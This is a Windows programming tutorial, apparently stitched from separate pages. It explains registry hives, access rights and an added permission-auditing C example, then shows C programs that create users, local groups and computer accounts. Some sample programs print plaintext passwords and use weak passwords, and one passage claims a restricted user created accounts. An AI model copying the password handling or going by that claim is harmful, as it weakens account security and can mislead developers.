Description: Registry entries subordinate to this key define the physical state of the computer, including data about the bus type, system memory, and installed hardware and software. It contains subkeys that hold current configuration data, including Plug and Play information (the Enum branch, which includes a complete list of all hardware that has ever been on the system), network logon preferences, network security information, software-related information (such as server names and the location of the server), and other system information.

Handle: HKEY_PERFORMANCE_DATA
Description: Registry entries subordinate to this key allow you to access performance data. The data is not actually stored in the registry; the registry functions cause the system to collect the data from its source. Windows Me/98/95: This key is not supported.

Handle: HKEY_PERFORMANCE_NLSTEXT
Description: Registry entries subordinate to this key reference the text strings that describe counters in the local language of the area in which the computer system is running. These entries are not available to Regedit.exe and Regedt32.exe. Windows 2000/NT, Windows Me/98/95: This key is not supported.

Handle: HKEY_PERFORMANCE_TEXT
Description: Registry entries subordinate to this key reference the text strings that describe counters in US English. These entries are not available to Regedit.exe and Regedt32.exe. Windows 2000/NT, Windows Me/98/95: This key is not supported.

Handle: HKEY_USERS
Description: Registry entries subordinate to this key define the default user configuration for new users on the local computer and the user configuration for the current user.

Table 1.

The RegOverridePredefKey() function enables you to map a predefined registry key to a specified key in the registry. For instance, a software installation program could remap a predefined key before installing a DLL component. This enables the installation program to easily examine the information that the DLL's installation procedure writes to the predefined key.


Figure 2: HKEY_CLASSES_ROOT registry key.

Figure 3: HKEY_CURRENT_USER registry key.


Figure 4: HKEY_LOCAL_MACHINE registry key.

Figure 5: HKEY_USERS registry key.


Figure 6: HKEY_CURRENT_CONFIG registry key.

Registry Hives

A hive is a group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data. The setup phase of the Windows boot process automatically retrieves data from these supporting files. You can also retrieve data manually using the Import Registry File menu item of the Registry Editor (Regedit.exe). When you shut down Windows, the operating system automatically writes the hive data to the supporting files. You can also back up the hive data manually using the Export Registry File menu item of the Registry Editor.

The supporting files for all hives except HKEY_CURRENT_USER are in the %SystemRoot%\System32\Config directory. The supporting files for HKEY_CURRENT_USER are in the %SystemRoot%\Documents and Settings\Username directory; for Windows NT they are in the %SystemRoot%\Profiles\Username directory. The file name extensions of the files in these directories, and in some cases the lack of an extension, indicate the type of data they contain. The following table lists these extensions along with a description of the data in the file.

Figure 7: The C:\Documents and Settings\Johnny directory, user supporting files.

Figure 8: C:\WINDOWS\system32\config directory, supporting files for all hives.



Extension: No extension
Description: A complete copy of the hive data.

Extension: .alt
Description: A backup copy of the critical HKEY_LOCAL_MACHINE\System hive. Only the System key has an .alt file.

Extension: .log
Description: A transaction log of changes to the keys and value entries in the hive.

Extension: .sav
Description: Copies of the hive files as they looked at the end of the text-mode stage in Setup. Setup has two stages: text mode and graphics mode. The hive is copied to a .sav file after the text-mode stage of setup to protect it from errors that might occur if the graphics-mode stage of setup fails. If setup fails during the graphics-mode stage, only the graphics-mode stage is repeated when the computer is restarted; the .sav file is used to restore the hive data.

Table 2.

The following table lists the standard hives and their supporting files.

Registry hive: HKEY_CURRENT_CONFIG
Supporting files: System, System.alt, System.log, System.sav

Registry hive: HKEY_CURRENT_USER
Supporting files: Ntuser.dat, Ntuser.dat.log

Registry hive: HKEY_LOCAL_MACHINE\SAM
Supporting files: Sam, Sam.log, Sam.sav

Registry hive: HKEY_LOCAL_MACHINE\Security
Supporting files: Security, Security.log, Security.sav

Registry hive: HKEY_LOCAL_MACHINE\Software
Supporting files: Software, Software.log, Software.sav

Registry hive: HKEY_LOCAL_MACHINE\System
Supporting files: System, System.alt, System.log, System.sav

Registry hive: HKEY_USERS\.DEFAULT
Supporting files: Default, Default.log, Default.sav

Table 3.

Each time a new user logs on to a computer, a new hive is created for that user with a separate file for the user profile. This is called the user profile hive. A user's hive contains specific registry information pertaining to the user's application settings, desktop, environment, network connections, and printers. User profile hives are located under the HKEY_USERS key. The supporting file for the user profile hive for a particular user is located in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\SID\ProfileImagePath, and is named Ntuser.dat. The value of ProfileImagePath is a binary representation of the directory name of the user's profile, which includes the user's name. Use the Registry Editor to display this binary value as a string.


Figure 9: User (Johnny) profile hives under ProfileList key.

Figure 10: Ntuser.dat, the supporting file for the user (Johnny) profile hive.

Categories of Data

Before putting data into the registry, an application should divide the data into two categories: computer-specific data and user-specific data. By making this distinction, an application can support multiple users, and yet locate user-specific data over a network and use that data in different locations, allowing location-independent user profile data. A user profile is a set of configuration data saved for every user.

When the application is installed, it should record the computer-specific data under the HKEY_LOCAL_MACHINE key. In particular, it should create keys for the company name, product name, and version number, as shown in the following example:

HKEY_LOCAL_MACHINE\Software\MyCompany\MyProduct\1.0

If the application supports COM, it should record that data under HKEY_LOCAL_MACHINE\Software\Classes. An application should record user-specific data under the HKEY_CURRENT_USER key, as shown in the following example:

HKEY_CURRENT_USER\Software\MyCompany\MyProduct\1.0

Opening, Creating, and Closing Keys

Before an application can add data to the registry, it must create or open a key. To create or open a key, an application always refers to the key as a subkey of a currently open key. The following predefined keys are always open:

- HKEY_LOCAL_MACHINE
- HKEY_CLASSES_ROOT
- HKEY_USERS
- HKEY_CURRENT_USER

An application uses the RegOpenKeyEx() function to open a key and the RegCreateKeyEx() function to create a key.


An application can use the RegCloseKey() function to close a key and write the data it contains into the registry. RegCloseKey() does not necessarily write the data to the registry before returning; it can take as much as several seconds for the cache to be flushed to the hard disk. If an application must explicitly write registry data to the hard disk, it can use the RegFlushKey() function. RegFlushKey(), however, uses many system resources and should be called only when absolutely necessary.

Writing and Deleting Registry Data

An application can use the RegSetValueEx() function to associate a value and its data with a key. To delete a value from a key, an application can use the RegDeleteValue() function. To delete a key, it can use the RegDeleteKey() function. A deleted key is not removed until the last handle to it has been closed. Subkeys and values cannot be created under a deleted key. It is not possible to lock a registry key during a write operation to synchronize access to the data. However, you can control access to a registry key using security attributes.

Retrieving Data from the Registry

To retrieve data from the registry, an application typically enumerates the subkeys of a key until it finds a particular one and then retrieves data from the value or values associated with it. An application can call the RegEnumKeyEx() function to enumerate the subkeys of a given key. To retrieve detailed data about a particular subkey, an application can call the RegQueryInfoKey() function. The RegGetKeySecurity() function retrieves a copy of the security descriptor protecting a key. An application can use the RegEnumValue() function to enumerate the values for a given key, and the RegQueryValueEx() function to retrieve a particular value for a key. An application typically calls RegEnumValue() to determine the value names and then RegQueryValueEx() to retrieve the data for the names.
The RegQueryMultipleValues() function retrieves the type and data for a list of value names associated with an open registry key. This function is useful for dynamic key providers because it assures consistency of data by retrieving multiple values in an atomic operation. Because other applications can change the data in a registry value between the time your application reads a value and the time it uses it, you may need to ensure your application has the latest data. You can use the RegNotifyChangeKeyValue() function to notify the calling thread when there are changes to the attributes or contents of a registry key, or if the key is deleted. The function signals an event object to notify the caller. If the thread that calls RegNotifyChangeKeyValue() exits, the event is signaled and the monitoring of the registry key is stopped. You can control or specify what changes should be reported through the use of a notify filter or flag. Usually, changes are reported by signaling an event that you specify to the function. Note that the RegNotifyChangeKeyValue() function does not work with remote handles.

Registry Files

Applications can save part of the registry in a file and then load the contents of the file back into the registry. A registry file is useful when a large amount of data is being manipulated, when many entries are being made in the registry, or when the data is transitory and must be loaded and then unloaded again. Applications that back up and restore parts of the registry are likely to use registry files. To save a key and its subkeys and values to a registry file, an application can call the RegSaveKey() function. RegSaveKey() creates the file with the following information, depending upon which operating system it is running on.

System: Windows Me/98/95
File attributes: Archive, hidden, read-only system
Location if no path is specified: Created in the Windows directory for both local and remote keys.
Error returned if file already exists: Error code 1016, ERROR_REGISTRY_IO_FAILED

System: Windows Server 2003, Windows XP/2000/NT
File attributes: Archive
Location if no path is specified: Created in the current directory of the process for a local key, and in the %systemroot%\system32 directory for a remote key.
Error returned if file already exists: Error code 183, ERROR_ALREADY_EXISTS

Table 4.

To write the registry file back to the registry, an application can use the RegLoadKey(), RegReplaceKey(), or RegRestoreKey() function.

RegLoadKey() loads registry data from a specified file into a specified subkey under HKEY_USERS or HKEY_LOCAL_MACHINE on the calling application's computer or on a remote computer. The function creates the specified subkey if it does not already exist. After calling this function, an application can use the RegUnLoadKey() function to restore the registry to its previous state.

RegReplaceKey() replaces a key and all its subkeys and values in the registry with the data contained in a specified file. The new data takes effect the next time the system is started.

RegRestoreKey() loads registry data from a specified file into a specified key on the calling application's computer or on a remote computer. This function replaces the subkeys and values below the specified key with the subkeys and values that follow the top-level key in the file.

The RegConnectRegistry() function establishes a connection to a predefined registry handle on another computer. An application uses this function primarily to access information from a remote registry on other machines in a network environment, which you can also do by using the Registry Editor. You might want to access a remote registry to back up a registry or regulate network access to it. Note that you must have appropriate permissions to access a remote registry using this function.

Registry Key Security and Access Rights

The Windows security model enables you to control access to registry keys. You can specify a security descriptor for a registry key when you call the RegCreateKeyEx() or RegSetKeySecurity() function. If you specify NULL, the key gets a default security descriptor.
The ACLs in a default security descriptor for a key are inherited from its direct parent key. To get the security descriptor of a registry key, call the GetNamedSecurityInfo() or GetSecurityInfo() function. The valid access rights for registry keys include the DELETE, READ_CONTROL, WRITE_DAC, and WRITE_OWNER standard access rights. Registry keys do not support the SYNCHRONIZE standard access right. The following table lists the specific access rights for registry key objects.

Value: KEY_ALL_ACCESS
Meaning: Combines the STANDARD_RIGHTS_REQUIRED, KEY_QUERY_VALUE, KEY_SET_VALUE, KEY_CREATE_SUB_KEY, KEY_ENUMERATE_SUB_KEYS, KEY_NOTIFY, and KEY_CREATE_LINK access rights.

Value: KEY_CREATE_LINK
Meaning: Reserved for system use.

Value: KEY_CREATE_SUB_KEY
Meaning: Required to create a subkey of a registry key.

Value: KEY_ENUMERATE_SUB_KEYS
Meaning: Required to enumerate the subkeys of a registry key.

Value: KEY_EXECUTE
Meaning: Equivalent to KEY_READ.

Value: KEY_NOTIFY
Meaning: Required to request change notifications for a registry key or for subkeys of a registry key.

Value: KEY_QUERY_VALUE
Meaning: Required to query the values of a registry key.

Value: KEY_READ
Meaning: Combines the STANDARD_RIGHTS_READ, KEY_QUERY_VALUE, KEY_ENUMERATE_SUB_KEYS, and KEY_NOTIFY values.

Value: KEY_SET_VALUE
Meaning: Required to create, delete, or set a registry value.

Value: KEY_WOW64_64KEY
Meaning: Enables a 64- or 32-bit application to open a 64-bit key on 64-bit Windows. This flag must be combined using the OR operator with the other flags in this table that either query or access registry values.

Value: KEY_WOW64_32KEY
Meaning: Enables a 64- or 32-bit application to open a 32-bit key on 64-bit Windows. This flag must be combined using the OR operator with the other flags in this table that either query or access registry values.

Value: KEY_WRITE
Meaning: Combines the STANDARD_RIGHTS_WRITE, KEY_SET_VALUE, and KEY_CREATE_SUB_KEY access rights.

Table 5.

When you call the RegOpenKeyEx() function, the system checks the requested access rights against the key's security descriptor. If the user does not have the correct access to the registry key, the open operation fails. If an administrator needs access to the key, the solution is to enable the SE_TAKE_OWNERSHIP_NAME privilege and open the registry key with WRITE_OWNER access. You can request the ACCESS_SYSTEM_SECURITY access right to a registry key if you want to read or write the key's SACL.
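The following is an added example, not part of the original tutorial: it rebuilds the composite rights of Table 5 from their parts, decodes an access mask into right names, and flags DACL entries that allow a key to be changed. The numeric values are those of winnt.h repeated so the code builds without Windows headers; the function names, the simplified open check (allow entries only) and the sample grants are assumptions of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Access-right values as defined in winnt.h, repeated so this builds anywhere. */
#define DELETE                   0x00010000u
#define READ_CONTROL             0x00020000u
#define WRITE_DAC                0x00040000u
#define WRITE_OWNER              0x00080000u
#define STANDARD_RIGHTS_REQUIRED 0x000F0000u
#define STANDARD_RIGHTS_READ     READ_CONTROL
#define STANDARD_RIGHTS_WRITE    READ_CONTROL
#define ACCESS_SYSTEM_SECURITY   0x01000000u
#define KEY_QUERY_VALUE          0x0001u
#define KEY_SET_VALUE            0x0002u
#define KEY_CREATE_SUB_KEY       0x0004u
#define KEY_ENUMERATE_SUB_KEYS   0x0008u
#define KEY_NOTIFY               0x0010u
#define KEY_CREATE_LINK          0x0020u
#define KEY_WOW64_64KEY          0x0100u
#define KEY_WOW64_32KEY          0x0200u
/* Composite rights, combined as Table 5 describes them. */
#define KEY_READ  (STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY)
#define KEY_WRITE (STANDARD_RIGHTS_WRITE | KEY_SET_VALUE | KEY_CREATE_SUB_KEY)
#define KEY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEY_QUERY_VALUE | KEY_SET_VALUE | \
                        KEY_CREATE_SUB_KEY | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY | KEY_CREATE_LINK)
/* Rights that let the holder change the key, its values, its DACL or its owner. */
#define REG_CHANGE_RIGHTS (KEY_SET_VALUE | KEY_CREATE_SUB_KEY | KEY_CREATE_LINK | \
                           DELETE | WRITE_DAC | WRITE_OWNER)

struct right_name { uint32_t bit; const char *name; };
static const struct right_name RIGHTS[] = {
    { KEY_QUERY_VALUE, "KEY_QUERY_VALUE" }, { KEY_SET_VALUE, "KEY_SET_VALUE" },
    { KEY_CREATE_SUB_KEY, "KEY_CREATE_SUB_KEY" },
    { KEY_ENUMERATE_SUB_KEYS, "KEY_ENUMERATE_SUB_KEYS" },
    { KEY_NOTIFY, "KEY_NOTIFY" }, { KEY_CREATE_LINK, "KEY_CREATE_LINK" },
    { DELETE, "DELETE" }, { READ_CONTROL, "READ_CONTROL" },
    { WRITE_DAC, "WRITE_DAC" }, { WRITE_OWNER, "WRITE_OWNER" },
    { ACCESS_SYSTEM_SECURITY, "ACCESS_SYSTEM_SECURITY" },
};

/* Hypothetical record: one allow entry of a key's DACL. */
struct reg_grant { const char *trustee; uint32_t mask; };
/* Constructed sample data, not taken from a real system. */
static const struct reg_grant SAMPLE_GRANTS[] = {
    { "Users",          0x00020019u },
    { "Power Users",    0x0002001Fu },
    { "Administrators", 0x000F003Fu },
};

/* Appends s to out, separated by '|', never writing past outlen bytes. */
static void append(char *out, size_t outlen, const char *s)
{
    size_t used = strlen(out);
    if (used > 0 && used + 1 < outlen) { out[used++] = '|'; out[used] = '\0'; }
    strncat(out, s, outlen - used - 1);
}

/* Writes the individual rights in mask as NAME|NAME...; bits with no name in
   the table (SYNCHRONIZE, for instance) are appended in hex.
   Returns the number of named rights found. */
size_t reg_describe_mask(uint32_t mask, char *out, size_t outlen)
{
    size_t named = 0, i;
    char tmp[16];
    if (outlen == 0) return 0;
    out[0] = '\0';
    for (i = 0; i < sizeof RIGHTS / sizeof RIGHTS[0]; i++) {
        if (mask & RIGHTS[i].bit) {
            append(out, outlen, RIGHTS[i].name);
            mask &= ~RIGHTS[i].bit;
            named++;
        }
    }
    if (mask) {
        snprintf(tmp, sizeof tmp, "0x%08X", (unsigned)mask);
        append(out, outlen, tmp);
    }
    return named;
}

/* 1 if the mask contains any right that permits changing the key. */
int reg_mask_allows_change(uint32_t mask) { return (mask & REG_CHANGE_RIGHTS) != 0; }

/* Simplified model of the check made on open: every requested right must be
   granted. The KEY_WOW64_* flags select a registry view and are not rights,
   so they are removed before comparing. */
int reg_open_would_succeed(uint32_t granted, uint32_t desired)
{
    desired &= ~(KEY_WOW64_64KEY | KEY_WOW64_32KEY);
    return (desired & ~granted) == 0;
}

/* Counts the entries whose mask permits changing the key. */
size_t reg_count_change_grants(const struct reg_grant *g, size_t n)
{
    size_t i, count = 0;
    for (i = 0; i < n; i++) count += (size_t)reg_mask_allows_change(g[i].mask);
    return count;
}

int main(void)
{
    char buf[200];
    size_t i;
    for (i = 0; i < sizeof SAMPLE_GRANTS / sizeof SAMPLE_GRANTS[0]; i++) {
        reg_describe_mask(SAMPLE_GRANTS[i].mask, buf, sizeof buf);
        printf("%-15s 0x%08X %s%s\n", SAMPLE_GRANTS[i].trustee,
               (unsigned)SAMPLE_GRANTS[i].mask, buf,
               reg_mask_allows_change(SAMPLE_GRANTS[i].mask) ? "  <-- can change key" : "");
    }
    return 0;
}
```

When reviewing a key that holds configuration read by a privileged service, the entries flagged as able to change the key are the ones to compare against the accounts that actually need write access.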


This is a continuation from the previous Windows User Accounts & Groups Programming 3. The expected skills are:

- Able to understand users and groups as implemented in Windows OSes.
- Able to understand and use functions to manipulate users, groups and machine accounts.
- Able to gather and understand the required information in order to use those functions.
- Able to understand, appreciate and apply how Unicode/wide characters are implemented in Microsoft C programs.

Privilege and User Management

As a restricted user, to run your program in debug mode you must be a member of the Debugger Users group. The following example tries to show how a privilege is required to accomplish our task. First of all, using the previous program example, let's add the restricted users as members of the Debugger Users group so that they can run programs in debug mode. Make sure you remove mytestgroup from the Administrators group, where it ended up as a result of the previous program example. A sample output:

F:\myproject\win32prog\Debug>myaddmember mypersonal "Debugger Users" mypersonal\myuser#1
mypersonal\myuser#1 has been added successfully to Debugger Users on mypersonal machine.
F:\myproject\win32prog\Debug>myaddmember mypersonal "Debugger Users" mypersonal\myuser#2
mypersonal\myuser#2 has been added successfully to Debugger Users on mypersonal machine.
F:\myproject\win32prog\Debug>myaddmember mypersonal "Debugger Users" mypersonal\myuser#3
mypersonal\myuser#3 has been added successfully to Debugger Users on mypersonal machine.
F:\myproject\win32prog\Debug>


Then log off and log on as restricted user myuser#1 and start using Visual C++ .Net. First of all, let's try running our previous, first program example, creating users.

//********* myuserprog.cpp **********
// For WinXp
#define _WIN32_WINNT 0x0501
// Wide character/Unicode based program
#ifndef UNICODE
#define UNICODE
#endif

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <lm.h>

// This program accept 3 arguments: servername, username and password.
// It is run on local WinXp machine so the servername is the
// local WinXp machine name or you can use NULL for the 1st parameter
// of the NetUserAdd() and arguments, should be without the servername.
int wmain(int argc, wchar_t *argv[ ])
{
    USER_INFO_1 ui;
    DWORD dwLevel = 1;
    DWORD dwError = 0;
    NET_API_STATUS nStatus;

    if(argc != 4)
    {
        fwprintf(stderr, L"Usage: %s ServerName UserName Password.\n", argv[0]);
        // or use fwprintf(stderr, L"Usage: %s UserName Password.\n", argv[0]);
        // for local machine and adjust other argc and argv[] array element appropriately.
        exit(1);
    }

    // Set up the USER_INFO_1 structure.
    // USER_PRIV_USER: name identifies an normal user
    // UF_SCRIPT: required for LAN Manager 2.0 and Windows NT and later.
    ui.usri1_name = argv[2];           // Username entered through command line
    ui.usri1_password = argv[3];       // Password (third and last argument)
    ui.usri1_priv = USER_PRIV_USER;    // As a normal/restricted user
    ui.usri1_home_dir = NULL;          // No home directory
    ui.usri1_comment = L"This is a test normal user account using NetUserAdd"; // Comment
    ui.usri1_flags = UF_SCRIPT;        // Must be UF_SCRIPT
    ui.usri1_script_path = NULL;       // No script path

    // Call the NetUserAdd() function, specifying level 1.
    nStatus = NetUserAdd(argv[1], dwLevel, (LPBYTE)&ui, &dwError);

    // If the call succeeds, inform the user.
    if(nStatus == NERR_Success)
    {
        fwprintf(stderr, L"%s user has been successfully added on %s machine.\n", argv[2], argv[1]);
        fwprintf(stderr, L"Username: %s password: %s.\n", argv[2], argv[3]);
    }
    // Otherwise, print the system error.
    else
        fprintf(stderr, "A system error has occurred: %d\n", nStatus);
    return 0;
}

A sample output:


F:\myuserprog\myuserprog\Debug>myuserprog mypersonal user#1 12345678

user#1 user has been successfully added on mypersonal machine.

Username: user#1 password: 12345678.

F:\myuserprog\myuserprog\Debug>myuserprog mypersonal user#2 12345678

user#2 user has been successfully added on mypersonal machine.

Username: user#2 password: 12345678.

F:\myuserprog\myuserprog\Debug>myuserprog mypersonal user#3 12345678

user#3 user has been successfully added on mypersonal machine.


Username: user#3 password: 12345678.

F:\myuserprog\myuserprog\Debug>

Figure 5: user#1, user#2 and user#3 have been created.

Well, we can create a user account just by being a member of the Debugger Users group. Then let's test the previous program that creates a local group.

//********* myuserproglg.cpp **********
// For WinXp
#define _WIN32_WINNT 0x0501
// Wide character/Unicode based program
#ifndef UNICODE
#define UNICODE
#endif

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <lm.h>

// This program accept 3 arguments: servername, GroupName and Comment.
int wmain(int argc, wchar_t *argv[ ])
{
    LOCALGROUP_INFO_1 lgi1;
    DWORD dwLevel = 1;
    DWORD dwError = 0;
    NET_API_STATUS nStatus;

    if(argc != 4)
    {
        fwprintf(stderr, L"Usage: %s ServerName GroupName Comment\n", argv[0]);
        // Just exit, no further processing
        exit(1);
    }

    // Set up the LOCALGROUP_INFO_1 structure.
    // Assign the group name and comment
    lgi1.lgrpi1_name = argv[2];      // Local group name
    lgi1.lgrpi1_comment = argv[3];   // Comment

    // Call the NetLocalGroupAdd() function, specifying level 1.
    nStatus = NetLocalGroupAdd(argv[1], dwLevel, (LPBYTE)&lgi1, &dwError);

    // If the call succeeds, inform the user.
    if(nStatus == NERR_Success)
        fwprintf(stderr, L"%s local group has been created successfully on %s machine.\n", argv[2], argv[1]);
    // Otherwise, print the system error.
    else
        fprintf(stderr, "A system error has occurred: %d\n", nStatus);
    return 0;
}

A sample output:

F:\myuserprog\myuserprog\Debug>myuserproglg
Usage: myuserproglg ServerName GroupName Comment
F:\myuserprog\myuserprog\Debug>myuserproglg mypersonal normalusergroup "Created by restricted user"
normalusergroup local group has been created successfully on mypersonal machine.
F:\myuserprog\myuserprog\Debug>

Verify our task.

Figure 6: normalusergroup group has been created.

Also successful. Then test the program example that adds a user to a group. When running the previous program example to add a user as a member of the built-in Users and Power Users groups, the following error code is displayed in the output. A sample output:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\myuser#1>f:
F:\myuserprog\myuserprog\Debug>mynewaddmember
Usage: mynewaddmember ServerName GroupName MemberAccountName-(DomainName\AccountName)
F:\myuserprog\myuserprog\Debug>mynewaddmember mypersonal Users mypersonal\user#1
A system error has occurred: 5
F:\myuserprog\myuserprog\Debug>mynewaddmember mypersonal "Power Users" mypersonal\user#1
A system error has occurred: 5
F:\myuserprog\myuserprog\Debug>

This error code means: 5 - Access is denied (ERROR_ACCESS_DENIED). So as a restricted user we don't have the privilege, because the access token that we are carrying doesn't have permission to complete the task.

Creating a Local Group and Adding a User

Windows Server 2003 family, Windows XP, Windows 2000, and Windows NT use the same functions that Microsoft LAN Manager uses to create and maintain user and local group-account information. For example, to create a new local group, call the NetLocalGroupAdd() function. To add a user to that group, call the NetLocalGroupAddMembers() function. The following program allows you to create a user and a local group and then add the user to the local group.

The following program example has been run on a Windows 2000 member server of the jmtibm.com domain. Its Fully Qualified Domain Name (FQDN) is jmti_st_00.jmtibm.com and the Domain Controller's (DC) FQDN is mawar.jmtibm.com. The member server was logged on as Domain Administrator. The compiler used is Visual C++ 6.0. The steps to include the netapi32.lib library (or another library) in the project in Visual C++ 6.0 are shown below.


Open the Project menu and choose the Setting... sub menu. Then click the Link tab on the right page. Under Object/Library modules: type the library name manually at the end of the list, separated by a space. Click the OK button.

Figure 7: Adding library to Visual C++ project.


Figure 8: Another step of adding library to Visual C++ project.

Then let's run our program example that creates a new user and a group, then includes the user as a member of that group.

//********* myusrgrp.cpp ************
// Network management functions have their own
// error codes...
#define _WIN32_WINNT 0x0500
#define UNICODE 1
#include <windows.h>
#include <lmcons.h>
#include <lmaccess.h>
#include <lmerr.h>
#include <lmapibuf.h>
#include <stdio.h>
#include <stdlib.h>

NET_API_STATUS MyTestNet(LPWSTR lpszDomain, LPWSTR lpszUser, LPWSTR lpszPassword, LPWSTR lpszLocalGroup)
{
    USER_INFO_1               user_info;
    LOCALGROUP_INFO_1         localgroup_info;
    LOCALGROUP_MEMBERS_INFO_3 localgroup_members;
    LPWSTR                    lpszPrimaryDC = L"mawar";
    NET_API_STATUS            err = 0;
    DWORD                     parm_err = 0;

    // First get the name of the primary domain controller.
    // Make sure to free the returned buffer.
    err = NetGetDCName(L"mawar",                    // Local machine
                       lpszDomain,                  // Domain name; if NULL, the primary domain is used
                       (LPBYTE *)&lpszPrimaryDC);   // Returned PDC
    if(err != 0)
    {
        printf("Error getting DC name: %d\n", err);
        return(err);
    }

    // Set up the USER_INFO_1 structure.
    user_info.usri1_name = lpszUser;
    user_info.usri1_password = lpszPassword;
    user_info.usri1_priv = USER_PRIV_USER;
    user_info.usri1_home_dir = TEXT("");
    user_info.usri1_comment = TEXT("This is just a sample user lol!");
    user_info.usri1_flags = UF_SCRIPT;
    user_info.usri1_script_path = TEXT("");

    err = NetUserAdd(lpszPrimaryDC,        // PDC name
                     1,                    // Level, use other level for more information
                     (LPBYTE)&user_info,   // Input buffer
                     &parm_err);           // Parameter in error
    switch (err)
    {
    case 0:
        printf("%ls user successfully created.\n", user_info.usri1_name);
        break;
    case NERR_UserExists:
        printf("%ls user already exists.\n", user_info.usri1_name);
        err = 0;
        break;
    case ERROR_INVALID_PARAMETER:
        {
            printf("Invalid Parameter Error adding user: Parameter Index = %d\n", parm_err);
            NetApiBufferFree(lpszPrimaryDC);
            return(err);
        }
    default:
        printf("Error adding %ls user: %d\n", user_info.usri1_name, err);
        NetApiBufferFree(lpszPrimaryDC);
        return(err);
    }

    // Set up the LOCALGROUP_INFO_1 structure.
    localgroup_info.lgrpi1_name = lpszLocalGroup;
    localgroup_info.lgrpi1_comment = TEXT("This is just a sample Local group.");

    err = NetLocalGroupAdd(lpszPrimaryDC,              // PDC name
                           1,                          // Level
                           (LPBYTE)&localgroup_info,   // Input buffer
                           &parm_err);                 // Parameter in error
    switch (err)
    {
    case 0:
        printf("%ls Local Group successfully created.\n", localgroup_info.lgrpi1_name);
        break;
    case ERROR_ALIAS_EXISTS:
        printf("%ls Local Group already exists.\n", localgroup_info.lgrpi1_name);
        err = 0;
        break;
    case ERROR_INVALID_PARAMETER:
        {
            // Print the index of the offending parameter, not the error code.
            printf("Invalid Parameter Error adding Local Group: Parameter Index = %d\n", parm_err);
            NetApiBufferFree(lpszPrimaryDC);
            return(err);
        }
    default:
        printf("Error adding %ls Local Group: %d\n", localgroup_info.lgrpi1_name, err);
        NetApiBufferFree(lpszPrimaryDC);
        return(err);
    }

    // Now add the user to the local group.
    localgroup_members.lgrmi3_domainandname = lpszUser;
    err = NetLocalGroupAddMembers(lpszPrimaryDC,                // PDC name
                                  lpszLocalGroup,               // Group name
                                  3,                            // Name
                                  (LPBYTE)&localgroup_members,  // Buffer
                                  1);                           // Count
    switch(err)
    {
    case 0:
        printf("%ls user successfully added to %ls Local Group.\n", user_info.usri1_name, localgroup_info.lgrpi1_name);
        break;
    case ERROR_MEMBER_IN_ALIAS:
        printf("User %ls already in %ls Local Group.\n", user_info.usri1_name, localgroup_info.lgrpi1_name);
        err = 0;
        break;
    default:
        printf("Error adding %ls user to %ls Local Group: %d\n", user_info.usri1_name, localgroup_info.lgrpi1_name, err);
        break;
    }
    NetApiBufferFree(lpszPrimaryDC);
    return (err);
}

// This program run at command prompt, receives 4 arguments: The domain name,
// user name (user account), user password and the group name.
int wmain(int argc, wchar_t *argv[])
{
    NET_API_STATUS err = 0;

    if(argc != 5)
    {
        printf("Usage: %ls <domain_name> <user_name> <password> <group_name>\n", argv[0]);
        exit (-1);
    }
    printf("Calling MyTestNet(): Create a user and a group then,\n");
    printf("add the user to the group.\n");
    printf("===================================================.\n");
    err = MyTestNet(argv[1],    // domain name
                    argv[2],    // user account
                    argv[3],    // password for the user
                    argv[4]);   // group name
    printf("MyTestNet() returned %d\n", err);
    return (0);
}

A sample output:

C:\myproject\win32prog\Debug>myusrgrp
Usage: myusrgrp <domain_name> <user_name> <password> <group_name>
C:\myproject\win32prog\Debug>myusrgrp jmtibm mytestuser 12345678 mytestgroup
Calling MyTestNet(): Create a user and a group then,
add the user to the group.
===================================================.
mytestuser user successfully created.
mytestgroup Local Group successfully created.
mytestuser user successfully added to mytestgroup Local Group.
MyTestNet() returned 0

Rerun the program with the same arguments. A sample output:

C:\myproject\win32prog\Debug>myusrgrp jmtibm mytestuser 12345678 mytestgroup
Calling MyTestNet(): Create a user and a group then,
add the user to the group.
===================================================.
mytestuser user already exists.
mytestgroup Local Group already exists.
User mytestuser already in mytestgroup Local Group.
MyTestNet() returned 0

It looks OK. Then verify our task.

Figure 9: mytestuser user and mytestgroup group have been created.


The mytestuser user is still not usable because no login name etc. has been set. Use the NetUserSetInfo() function with a different level to set other properties of the user account, as demonstrated in the previous program example. For a domain user account, when you try to delete the account a prompt asks whether that user's mailbox also needs to be deleted. This means an email account has also been created for that account.

Creating a New Computer Account

The following program example demonstrates how to create a new computer account using the NetUserAdd() function. The following are considerations for managing computer accounts:

* The computer account name should be all uppercase for consistency with Windows NT or later account management utilities.
* A computer account name always has a trailing dollar sign ($). Any functions used to manage computer accounts must build the computer name such that the last character of the computer account name is a dollar sign ($). For interdomain trust, the account name is TrustingDomainName$.
* The maximum computer name length is MAX_COMPUTERNAME_LENGTH (15). This length does not include the trailing dollar sign ($).
* The password for a new computer account should be the lowercase representation of the computer account name, without the trailing dollar sign ($). For interdomain trust, the password can be an arbitrary value that matches the value specified on the trust side of the relationship.
* The maximum password length is LM20_PWLEN (14). The password should be truncated to this length if the computer account name exceeds this length.
* The password provided at computer-account-creation time is valid only until the computer account becomes active on the domain. A new password is established during trust relationship activation.

The program example was run on a Windows 2000 member server of the jmtibm.com domain, the same as the previous example.

//********* machineacct.cpp *********
// For Win 2000
#define _WIN32_WINNT 0x0500
// Wide character/Unicode based program
#ifndef UNICODE
#define UNICODE
#endif

#include <windows.h>
#include <stdio.h>
#include <lm.h>

BOOL AddMachineAccount(LPWSTR wTargetComputer, LPWSTR MachineAccount, DWORD AccountType)
{
    LPWSTR wAccount;
    LPWSTR wPassword;
    USER_INFO_1 ui;
    DWORD cbAccount;
    DWORD cbLength;
    DWORD dwError;

    // Ensure a valid computer account type was passed.
    if(AccountType != UF_WORKSTATION_TRUST_ACCOUNT &&
       AccountType != UF_SERVER_TRUST_ACCOUNT &&
       AccountType != UF_INTERDOMAIN_TRUST_ACCOUNT)
    {
        SetLastError(ERROR_INVALID_PARAMETER);
